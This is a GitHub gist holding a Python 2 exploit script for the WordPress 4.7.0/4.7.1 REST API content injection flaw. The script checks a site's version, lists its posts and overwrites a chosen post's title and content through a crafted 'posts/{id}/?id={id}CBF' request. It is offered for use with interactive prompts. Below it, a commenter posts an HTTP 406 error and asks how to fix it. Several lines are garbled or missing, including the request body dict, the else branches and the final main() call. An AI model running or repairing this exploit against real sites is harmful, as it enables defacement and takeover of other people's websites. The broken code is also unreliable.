Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
Wordpress content injection exploit by snoww0lf
#! /usr/bin/env python
Technical Explanation:
REST API Wordpress reference:
Wordpress Version Affected: 4.7.0/4.7.1
2017 - Coded by snoww0lf.
import re
import json
import urllib2
class WpContent:
def __init__(self, url):
self.__url = url
self.__response = urllib2.urlopen(self.__url).read()
def get_api_wp(self):
return re.findall(r"' href='(.*)'", self.__response)[0]
def get_wp_version(self):
check_version = re.findall(r'ver=(.*)"', self.__response)[0]
if check_version == "4.7" or check_version == "4.7.1":
check_version += " ( Maybe vulnerable to inject ) "
check_version += " ( Maybe not vulnerable to inject ) "
return check_version
def get_wp_post_information(self):
get_post = urllib2.urlopen(self.get_api_wp()+"wp/v2/posts").read()
load_info = json.loads(get_post)
collected_information = ""
for load in load_info:
collected_information += "[x] Post ID: {0}\n[x] Post Title: {1}\n[x] Post URL: {2}\n[x] Post Content: {3} [SNIPPET]\n\n".\
format(load['id'], load['title']['rendered'].encode("utf-8"), load['link'], load['content']['rendered'][:100].encode('utf-8'))
return collected_information
def inject_content(self, id_content, title, content):
data = json.dumps({
params = {'Content-Type':'application/json'}
full_url = self.get_api_wp() + "wp/v2/posts/{0}/?id={0}CBF".format(id_content)
req = urllib2.Request(full_url, data, params)
resp = urllib2.urlopen(req).read()
return resp
def main():
print("[X] WORDPRESS 4.7.0/4.7.1 CONTENT INJECTION EXPLOIT BY snoww0lf [X]\n")
while True:
url = raw_input("[x] Enter the URL: ")
print("[?] Please wait ...\n")
wpcontent = WpContent(url)
wp_version = wpcontent.get_wp_version().split()[0]
print("[x] Wordpress Version: {0} ".format(wp_version))
if(wp_version == "4.7" or wp_version == "4.7.1"):
select = raw_input("[x] It's affected version. It seems vulnerable, continue? [y/n] ").lower()
while(select != "y" and select != "n"):
print("[x] Wrong selection! Try again.")
select = raw_input("[x] Affected version. Seems vulnerable, continue? [y/n] ").lower()
if(select == "y"):
print("[x] Parsing data information, please wait ...\n")
wp_information = wpcontent.get_wp_post_information()
inp_id = input("[x] Enter ID Content that you want to overwrite: ")
inp_title = raw_input("[x] Change title: ")
print("=> 1. Load data from file.")
print("=> 2. Input data.")
mode = input("[x] Change content by [1/2] ? ")
if mode == 1:
dfile = raw_input("[x] Enter the filename: ")
with open(dfile, 'r') as f:
readf = f.readlines()
print("[x] Exploit in progress ...\n")
wpcontent.inject_content(inp_id, inp_title, ''.join(readf))
inp_data = raw_input("[?] Input data: ")
print("[x] Exploit in progress ...\n")
wpcontent.inject_content(inp_id, inp_title, inp_data)
print("[x] Update success!\n")
cont = raw_input("[?] Continue ? [y/n] ").lower()
while(cont != "y" and cont != "n"):
print("[x] Wrong selection! Try again.")
cont = raw_input("[?] Continue ? [y/n] ").lower()
if cont == "n": break
cont = raw_input("[?] Continue ? ").lower()
while(cont != "y" and cont != "n"):
print("[x] Wrong selection! Try again.")
cont = raw_input("[?] Continue ? ").lower()
if cont == "n": break
if __name__ == '__main__':

I get this

  File "", line 101, in <module>
  File "", line 55, in main
    wpcontent = WpContent(url)
  File "", line 17, in __init__
    self.__response = urllib2.urlopen(self.__url).read()
  File "/usr/lib/python2.7/", line 154, in urlopen
    return, data, timeout)
  File "/usr/lib/python2.7/", line 435, in open
    response = meth(req, response)
  File "/usr/lib/python2.7/", line 548, in http_response
    'http', request, response, code, msg, hdrs)
  File "/usr/lib/python2.7/", line 473, in error
    return self._call_chain(*args)
  File "/usr/lib/python2.7/", line 407, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/", line 556, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
urllib2.HTTPError: HTTP Error 406: Not Acceptable

How do I fix it?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment